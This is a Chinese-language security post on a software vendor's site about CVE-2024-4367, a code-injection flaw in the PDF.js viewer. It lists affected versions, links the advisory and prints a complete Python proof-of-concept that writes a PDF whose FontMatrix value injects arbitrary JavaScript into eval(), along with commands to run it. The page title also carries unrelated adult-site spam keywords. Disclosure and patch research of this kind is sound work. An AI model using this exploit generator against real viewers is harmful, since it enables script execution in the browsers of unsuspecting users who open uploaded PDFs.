欧美成人精品手机在线观看_69视频国产_动漫精品第一页_日韩中文字幕网 - 日本欧美一区二区

LOGO OA教程 ERP教程 模切知識交流 PMS教程 CRM教程 開發文檔 其他文檔  
 
網站管理員

[點晴永久免費OA]【網絡安全】PDF.js在線預覽文件插件漏洞曝光

admin
2024年6月25日 22:2 本文熱度 1350

0x00 前言

PDF.js 是一個使用 HTML5 構建的便攜式文檔格式查看器。pdf.js 是社區驅動的,并由 Mozilla 支持。我們的目標是為解析和呈現 PDF 創建一個通用的、基于 Web 標準的平臺。

0x01 漏洞描述

在font_loader.js中存在代碼注入漏洞,當PDF.js配置isEvalSupported選項設置為true(默認值)時會將輸入傳遞到eval()函數,攻擊者可通過誘導用戶打開惡意PDF文件來利用漏洞,成功利用漏洞可以執行任意JavaScript。

0x02 CVE編號

CVE-2024-4367

0x03 影響版本

Mozilla PDF.js < 4.2.67

pdfjs-dist(npm) < 4.2.67

react-pdf(npm) < 7.7.3

8.0.0 <= react-pdf(npm) < 8.0.2

0x04 漏洞詳情

參見下方鏈接

https://github.com/mozilla/pdf.js/security/advisories/GHSA-wgrm-67xf-hhpq

0x05 漏洞復現

利用要求:


目標服務器是通過pdf.js插件打開pdf格式文件的,能傳pdf到目標服務器,能找到上傳的pdf路徑,能通過pdf.js查看上傳的pdf文件。

POC

import ioimport sys# CVE-2024-4367def create_malicious_pdf(filename, payload):    print("[*] POC Generated")    pdf_content = f'''%PDF-1.4%8 0 obj<</PatternType 2/Shading<<  /Function<<    /Domain[0 1]    /C0[0 0 1]    /C1[1 0.6 0]    /N 1    /FunctionType 2  >>  /ShadingType 2  /Coords[46 400 537 400]  /Extend[false false]  /ColorSpace/DeviceRGB>>/Type/Pattern>>endobj5 0 obj<</Widths[573 0 582 0 548 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 573 0 573 0 341]/Type/Font/BaseFont/PAXEKO+SourceSansPro-Bold/LastChar 102/Encoding/WinAnsiEncoding/FontMatrix [0.1 0 0 0.1 0 (1\); \n{payload}]/Subtype/Type1/FirstChar 65/FontDescriptor 9 0 R>>endobj2 0 obj<</Kids[3 0 R]/Type/Pages/Count 1>>endobj9 0 obj<</Type/FontDescriptor/ItalicAngle 0/Ascent 751/FontBBox[-6 -12 579 713]/FontName/PAXEKO+SourceSansPro-Bold/StemV 100/CapHeight 713/Flags 32/FontFile3 10 0 R/Descent -173/MissingWidth 250>>endobj6 0 obj<</Length 128>>stream47 379 489 230 re S/Pattern csBT  50 500 Td  117 TL  /F1 150 Tf  /P1 scn  (AbCdEf) Tj  /P2 scn  (AbCdEf) 'ETendstreamendobj3 0 obj<</Type/Page/Resources 4 0 R/Contents 6 0 R/Parent 2 0 R/MediaBox[0 0 595.2756 841.8898]>>endobj10 0 obj<</Length 800/Subtype/Type2>>stream
endstreamendobj7 0 obj<</PatternType 1/Matrix[1 0 0 1 50 0]/Length 58/TilingType 1/BBox[0 0 16 16]/YStep 16/PaintType 1/Resources<<>>/XStep 16>>stream0.65 g0 0 16 16 re f0.15 g0 0 8 8 re f8 8 8 8 re fendstreamendobj4 0 obj<</Pattern<<  /P1 7 0 R  /P2 8 0 R>>/Font<<  /F1 5 0 R>>>>endobj1 0 obj<</Pages 2 0 R/Type/Catalog/OpenAction[3 0 R /Fit]>>endobj
xref0 110000000000 65535 f 0000002260 00000 n 0000000522 00000 n 0000000973 00000 n 0000002178 00000 n 0000000266 00000 n 0000000794 00000 n 0000001953 00000 n 0000000015 00000 n 0000000577 00000 n 0000001085 00000 n trailer<</ID[(w4f) (w4f)]/Root 1 0 R/Size 11>>startxref2333%%EOF'''    with io.FileIO(filename, "wb") as file:        file.write(pdf_content.encode())
if __name__ == "__main__":    if len(sys.argv) != 3:        print('''Usage: python poc.py malicious.pdf "alert\('S4vvy')"''')        sys.exit(1)    filename = sys.argv[1]    custom_payload = sys.argv[2]    create_malicious_pdf(filename, custom_payload)

搭建PDF.js插件

詳情參見下方鏈接

https://blog.csdn.net/meisnb/article/details/115183049

運行poc程序:

python poc.py test.pdf "alert\('xss')"

http://127.0.0.1/DPFjs/web/viewer.html?file=http://127.0.0.1/malicious.pdf


0x06 參考鏈接

https://github.com/mozilla/pdf.js/security/advisories/GHSA-wgrm-67xf-hhpqhttps://github.com/s4vvysec/CVE-2024-4367-POChttps://cloud.tencent.com/developer/article/2419680


該文章在 2024/6/25 22:05:23 編輯過
關鍵字查詢
相關文章
正在查詢...
點晴ERP是一款針對中小制造業的專業生產管理軟件系統,系統成熟度和易用性得到了國內大量中小企業的青睞。
點晴PMS碼頭管理系統主要針對港口碼頭集裝箱與散貨日常運作、調度、堆場、車隊、財務費用、相關報表等業務管理,結合碼頭的業務特點,圍繞調度、堆場作業而開發的。集技術的先進性、管理的有效性于一體,是物流碼頭及其他港口類企業的高效ERP管理信息系統。
點晴WMS倉儲管理系統提供了貨物產品管理,銷售管理,采購管理,倉儲管理,倉庫管理,保質期管理,貨位管理,庫位管理,生產管理,WMS管理系統,標簽打印,條形碼,二維碼管理,批號管理軟件。
點晴免費OA是一款軟件和通用服務都免費,不限功能、不限時間、不限用戶的免費OA協同辦公管理系統。
Copyright 2010-2025 ClickSun All Rights Reserved